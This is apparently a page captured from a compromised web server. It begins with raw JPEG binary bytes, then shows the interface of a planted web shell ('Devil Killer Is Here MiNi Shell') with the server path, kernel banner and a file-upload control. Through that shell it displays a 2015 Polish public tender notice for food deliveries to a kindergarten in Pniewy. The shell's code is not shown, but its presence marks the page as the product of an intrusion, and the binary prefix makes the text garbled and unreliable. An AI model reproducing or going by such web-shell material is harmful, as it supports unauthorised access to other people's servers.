JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/333240-N-2015.html

<p class="kh_header"><b>Pniewy: Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach</b><br>
<b>Numer ogłoszenia: 333240 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole "Miś" , ul. Dworcowa 23, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2911216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mis.pniewy.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Gminy Pniewy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tabela  A  WARZYWA I OWOCE
Nazwa artykułu	Jednostka miary Ilość  Marchew luzem kg 120 Pietruszka korzeń kg 50 Rzodkiewka świeża p. pęczek 120 Sałata  szt.120 Sałata lodowa szt.50 Por korzeń kg50 Cebula biała kg100 Buraki czerwone kg200 Seler korzeń kg 100 Jabłka lobo  kg200 Mandarynki  kg 80 Kiwi  szt. 300 Ziemniaki jadalne kg3000 Kapusta czerwona świeża  kg100 Kapusta pekińska  szt.70 Kalafior świeży  szt.50 Pomidory luz kg  120 Ogórki szklarniowe kg 120 Seler naciowy pęczek 50 Ogórki kwaszone luz kg  150 Kapusta kwaszona kg150 Kapusta biała główka kg kg 200   Pieczarki świeże luz kg 40 Banan kg100 Papryka szt.40 truskawki kg60 Szczypior pęczek 100 Koper świeży pęczek 100 Natka pietruszki p. pęczek 100 Winogrono jasne kg100 cytryna kg 50.
Tabela B  MIĘSO I PRZETWORY         
Nazwa artykułu	Jedn. miary Ilość Ogonówka wieprzowa wędzona  kg150 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg200 Szynka wieprzowa wędzona got. kg100 Mięso wieprzowe mielone drobne kg200 Kiełbasa żywiecka kg100 Mięso gulaszowe wieprzowe kg200 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg 100 Porcje rosołowe z kurczaka kg150 Kiełbasa wieprzowa szynkowa kg250 Udka z kurczaka kg150 Karkówka b k wieprzowa kg 150 Kaszanka kg 100 Kurczak świeży patroszony do 2kg kg150 Wątróbka wieprzowa kg100 Parówka drobiowa cienka kg200 Kotlet schabowy b k kg150 Pasztet drobiowy kg100 Smalec luz kg50
Tabela C  MROŻONKI
Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5 kg op. szt.130 Truskawki mrożone  2,5  kg op.. szt.150 Mieszanka warzywna paski 2,5  kg op. szt.150 Brokuły mrożone 2,5  kg op.szt.	80 Zupa pieczarkowa, 2,5  kg op.szt.100 Zupa kalafiorowa, 2,5  kg op.szt.160 Zupa jarzynowa, 2,5  kg op. szt.	160 Kalafior 2,5  kg op. szt.120 Pyzy drożdżowe op.9szt szt.420 Groszek zielony  2,5  kg op. szt.100 Szpinak mrożony 2,5  kg op. szt50 Marchew z groszkiem, 2,5  kg op. szt.100 Wiśnie drążone 2,5  kg op. szt.40 Maliny 2,5 kg szt.10 Jagody 2,5 kg szt.10 Kompotowe 2,5kg op. szt. 200
Tabela D   PRZETWORY MĄCZNE, INNE
Nazwa artykułu	Jednostka miary Ilość Mąka pszenna 500  kg 125 Mąka razowa  kg 125 Ryż długoziarnisty  kg 100 Ryż ciemny kg  50 Kawa zbożowa (typu inka)150 g szt 30 Kasza jęczmienna średnia luz kg 30 Kasza jaglana kg 60 Kasza kuskus kg 60 Kasza gryczana	kg 60 Kasza manna 1kg kg 30 Kisiel różne smaki 40 g	szt. 300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.50 Cukier biały kryształ, paczkowany 1kg szt.500 Miód pszczeli nektarowy lipowy 0,4 kg	szt. 100 Dżemy różne smaki 0,30 wysokosłodzony szt.80 Kakao naturalne 150 g op. szt.10 Majonez dekoracyjny 0,7 kg op.  szt.50 Musztarda sarepska 0,9 kg op.	szt.20 Płatki owsiane 0,5 kg op. szt.50 Groch połówki luz  kg 50 Fasola sucha luz  kg 40 Koncentrat  pomidorowy 30% 0,9 l  szt.50 Galaretka do ciast różne smaki  0,75g szt.  240 Proszek do pieczenia 18g szt.50 Drożdże piekarskie 100g szt.70 Ketchup łagodny 500g	szt. 60 Ocet spirytusowy 10%, 0,5l szt.30 Sól 1kg szt.80 Sól niskosodowa 350 g szt.100 Liść laurowy 10g szt.30 Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt.40 Kwasek cytrynowy spożywczy 20g szt.40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg	szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml szt.50 Groszek zielony puszka 400ml	szt.40 Przecier ogórkowy 0,5 kg op. szt.50 Cynamon 20 g szt.40 Ziele angielskie 15g szt.80 Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l  szt.200 Tuńczyk puszka  170g op. szt.60 sardynka 135g op. szt.80 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana mineralna 5l  szt. 300 Imbir 20 g szt 60 Czosnek granulowany 20 g szt. 60 Bazylia 10 g szt. 60 Oregano 10 g szt. 60 herbaty ziołowe 4x30 g - 20 torebek szt. 60 zioła prowasalskie 10 g szt.  60 Herbata granulowana 100g op. szt.140 Papryka słodka syp. 0,5kg szt.60 Pieprz mielony 0,5 kg szt.60 Lubczyk 0,5 kg szt.20 Rozmaryn 0,5 kg szt 20 Ziarno kminku 0,5 kg szt.20 Ziarno sezamu 0,5 kg szt.20 Tymianek  0,5 kg szt.20
  Tabela E   SŁODYCZE
Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op.szt 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt. 10 Wafle kakaowe  b czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g szt. 280 Figurki czekoladowe - Zajączki 80g szt. 300 Jaja czekoladowe szt. 300 Wafle śmietankowe luz kg30
Tabela F  PIECZYWO
Nazwa artykułu	Jedn. miary Ilość Chleb baltonowski 0,6 kg krojony szt.1600 Chleb razowy 0,5 kg litewski krojony o niskiej zawartości sodu szt.800 Bułka firmowa  0,06 kg szt. 3500 Bułka grahamka szt. 2500 Chleb pszenny 0,35 kg szt. 600 Bułka tarta 1 kg szt. 40

Tabela G     NABIAŁ
Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l   szt.130 Śmietana zakwaszana 12% 180g szt.50 Twaróg półtłusty 250 g op. szt.600 Ser salami luz kg80 Sery topione bloczki 100g op. różne smaki szt. 50 Jajka kurze świeże średnie  szt.2000 Mleko 2,5% karton 1 l op.szt.1200 Ser kanapkowy 150g op.szt.150 Ser gouda kg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.200 Jogurt naturalny 0,45l op.szt.100 Jogurt smakowy 115g szt.1500 Śmietanka kremowa 30% 0,5l	szt. 30 Margaryna zwykła250g 	szt. 300 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200
Tabela H   MAKARONY I PRZYPRAWY
Nazwa artykułu	Jednostka miary Ilość Majeranek 0,30kg op. szt. 30 Zupa żurek 1 kg. op. szt. 4 Makaron drobny gwiazdki 100% pszenicy Durum 5kg op. szt. 60 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 10 Makaron rurki 100% pszenicy Durum 5kg op. szt. 40 Makaron łazanki 100% pszenicy Durum 3kg op. szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 30 Makaron ciemny rurki100% pszenicy Durum 5kg op. kg 50 Soki owocowe 5l bez cukru szt. 300
Tabela  I   RYBY
Nazwa towaru Jednostka miary Ilość Ryby mrożone filet z Pangi kg op.kg300 Ryby mrożone filet z dorsza kg op.kg200 Paluszki rybne Kg60 Ryby wiadro płaty śledziowe ocet 2kgkg60.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Tabela  A  WARZYWA I OWOCE
Nazwa artykułu	Jednostka miary Ilość  Marchew luzem kg 120 Pietruszka korzeń kg 50 Rzodkiewka świeża p. pęczek 120 Sałata  szt.120 Sałata lodowa szt.50 Por korzeń kg50 Cebula biała kg100 Buraki czerwone kg200 Seler korzeń kg 100 Jabłka lobo  kg200 Mandarynki  kg 80 Kiwi  szt. 300 Ziemniaki jadalne kg3000 Kapusta czerwona świeża  kg100 Kapusta pekińska  szt.70 Kalafior świeży  szt.50 Pomidory luz kg  120 Ogórki szklarniowe kg 120 Seler naciowy pęczek 50 Ogórki kwaszone luz kg  150 Kapusta kwaszona kg150 Kapusta biała główka kg kg 200   Pieczarki świeże luz kg 40 Banan kg100 Papryka szt.40 truskawki kg60 Szczypior pęczek 100 Koper świeży pęczek 100 Natka pietruszki p. pęczek 100 Winogrono jasne kg100 cytryna kg 50.
Tabela B  MIĘSO I PRZETWORY         
Nazwa artykułu	Jedn. miary Ilość Ogonówka wieprzowa wędzona  kg150 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg200 Szynka wieprzowa wędzona got. kg100 Mięso wieprzowe mielone drobne kg200 Kiełbasa żywiecka kg100 Mięso gulaszowe wieprzowe kg200 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg 100 Porcje rosołowe z kurczaka kg150 Kiełbasa wieprzowa szynkowa kg250 Udka z kurczaka kg150 Karkówka b k wieprzowa kg 150 Kaszanka kg 100 Kurczak świeży patroszony do 2kg kg150 Wątróbka wieprzowa kg100 Parówka drobiowa cienka kg200 Kotlet schabowy b k kg150 Pasztet drobiowy kg100 Smalec luz kg50
Tabela C  MROŻONKI
Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5 kg op. szt.130 Truskawki mrożone  2,5  kg op.. szt.150 Mieszanka warzywna paski 2,5  kg op. szt.150 Brokuły mrożone 2,5  kg op.szt.	80 Zupa pieczarkowa, 2,5  kg op.szt.100 Zupa kalafiorowa, 2,5  kg op.szt.160 Zupa jarzynowa, 2,5  kg op. szt.	160 Kalafior 2,5  kg op. szt.120 Pyzy drożdżowe op.9szt szt.420 Groszek zielony  2,5  kg op. szt.100 Szpinak mrożony 2,5  kg op. szt50 Marchew z groszkiem, 2,5  kg op. szt.100 Wiśnie drążone 2,5  kg op. szt.40 Maliny 2,5 kg szt.10 Jagody 2,5 kg szt.10 Kompotowe 2,5kg op. szt. 200
Tabela D   PRZETWORY MĄCZNE, INNE
Nazwa artykułu	Jednostka miary Ilość Mąka pszenna 500  kg 125 Mąka razowa  kg 125 Ryż długoziarnisty  kg 100 Ryż ciemny kg  50 Kawa zbożowa (typu inka)150 g szt 30 Kasza jęczmienna średnia luz kg 30 Kasza jaglana kg 60 Kasza kuskus kg 60 Kasza gryczana	kg 60 Kasza manna 1kg kg 30 Kisiel różne smaki 40 g	szt. 300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.50 Cukier biały kryształ, paczkowany 1kg szt.500 Miód pszczeli nektarowy lipowy 0,4 kg	szt. 100 Dżemy różne smaki 0,30 wysokosłodzony szt.80 Kakao naturalne 150 g op. szt.10 Majonez dekoracyjny 0,7 kg op.  szt.50 Musztarda sarepska 0,9 kg op.	szt.20 Płatki owsiane 0,5 kg op. szt.50 Groch połówki luz  kg 50 Fasola sucha luz  kg 40 Koncentrat  pomidorowy 30% 0,9 l  szt.50 Galaretka do ciast różne smaki  0,75g szt.  240 Proszek do pieczenia 18g szt.50 Drożdże piekarskie 100g szt.70 Ketchup łagodny 500g	szt. 60 Ocet spirytusowy 10%, 0,5l szt.30 Sól 1kg szt.80 Sól niskosodowa 350 g szt.100 Liść laurowy 10g szt.30 Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt.40 Kwasek cytrynowy spożywczy 20g szt.40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg	szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml szt.50 Groszek zielony puszka 400ml	szt.40 Przecier ogórkowy 0,5 kg op. szt.50 Cynamon 20 g szt.40 Ziele angielskie 15g szt.80 Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l  szt.200 Tuńczyk puszka  170g op. szt.60 sardynka 135g op. szt.80 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana mineralna 5l  szt. 300 Imbir 20 g szt 60 Czosnek granulowany 20 g szt. 60 Bazylia 10 g szt. 60 Oregano 10 g szt. 60 herbaty ziołowe 4x30 g - 20 torebek szt. 60 zioła prowasalskie 10 g szt.  60 Herbata granulowana 100g op. szt.140 Papryka słodka syp. 0,5kg szt.60 Pieprz mielony 0,5 kg szt.60 Lubczyk 0,5 kg szt.20 Rozmaryn 0,5 kg szt 20 Ziarno kminku 0,5 kg szt.20 Ziarno sezamu 0,5 kg szt.20 Tymianek  0,5 kg szt.20
  Tabela E   SŁODYCZE
Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op.szt 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt. 10 Wafle kakaowe  b czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g szt. 280 Figurki czekoladowe - Zajączki 80g szt. 300 Jaja czekoladowe szt. 300 Wafle śmietankowe luz kg30
Tabela F  PIECZYWO
Nazwa artykułu	Jedn. miary Ilość Chleb baltonowski 0,6 kg krojony szt.1600 Chleb razowy 0,5 kg litewski krojony o niskiej zawartości sodu szt.800 Bułka firmowa  0,06 kg szt. 3500 Bułka grahamka szt. 2500 Chleb pszenny 0,35 kg szt. 600 Bułka tarta 1 kg szt. 40

Tabela G     NABIAŁ
Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l   szt.130 Śmietana zakwaszana 12% 180g szt.50 Twaróg półtłusty 250 g op. szt.600 Ser salami luz kg80 Sery topione bloczki 100g op. różne smaki szt. 50 Jajka kurze świeże średnie  szt.2000 Mleko 2,5% karton 1 l op.szt.1200 Ser kanapkowy 150g op.szt.150 Ser gouda kg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.200 Jogurt naturalny 0,45l op.szt.100 Jogurt smakowy 115g szt.1500 Śmietanka kremowa 30% 0,5l	szt. 30 Margaryna zwykła250g 	szt. 300 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200
Tabela H   MAKARONY I PRZYPRAWY
Nazwa artykułu	Jednostka miary Ilość Majeranek 0,30kg op. szt. 30 Zupa żurek 1 kg. op. szt. 4 Makaron drobny gwiazdki 100% pszenicy Durum 5kg op. szt. 60 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 10 Makaron rurki 100% pszenicy Durum 5kg op. szt. 40 Makaron łazanki 100% pszenicy Durum 3kg op. szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 30 Makaron ciemny rurki100% pszenicy Durum 5kg op. kg 50 Soki owocowe 5l bez cukru szt. 300
Tabela  I   RYBY
Nazwa towaru Jednostka miary Ilość Ryby mrożone filet z Pangi kg op.kg300 Ryby mrożone filet z dorsza kg op.kg200 Paluszki rybne Kg60 Ryby wiadro płaty śledziowe ocet 2kgkg60</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 04.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki wynikające z art. 22 ust 1 - 3 ustawy z dnia 29 stycznia 2004 PZP oraz nie podlegają wykluczeniu na podstawie art. 24 ust 1-2 ustawy, złożą wymagane i opisane w SIWZ oświadczenia i dokumenty. Informacja o oświadczeniach i dokumentach  jakie mają dostarczyć wykonawcy  w celu potwierdzenia spełnienia warunków udziału w postępowaniu. W celu potwierdzenia spełnienia warunków Oferenci zobowiązani są do przedstawienia w ofercie następujących dokumentów i oświadczeń: Wypełniony formularz oferty dla danej tabeli. Oświadczenie o spełnianiu warunków określonych  w art. 22 ust. 1 oraz art. 24 ust. 1-2 ustawy (załącznik nr 2), aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert  (oryginał lub kopia poświadczona za zgodność z oryginałem  przez wykonawcę). W przypadku występowania pełnomocnika należy dołączyć pełnomocnictwo dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. Dokumenty stanowiące załączniki wymagane przez niniejsze SIWZ muszą zostać wypełnione przez oferenta bez wyjątku ściśle według warunków i postanowień w nich zawartych - bez dokonywania żadnych zmian i uzupełnień. Miejsca wykropkowane przeznaczone do wypełnienia muszą zostać prawidłowo wypełnione.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mis.pniewy.wlkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> biuro Intendenta, ul. Dworcowa 23, 62-045 Pniewy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 09:00, miejsce: biuro Dyrektora Przedszkola Miś w Pniewach
ul. Dworcowa 23
62-045 Pniewy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 15.01.2016.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
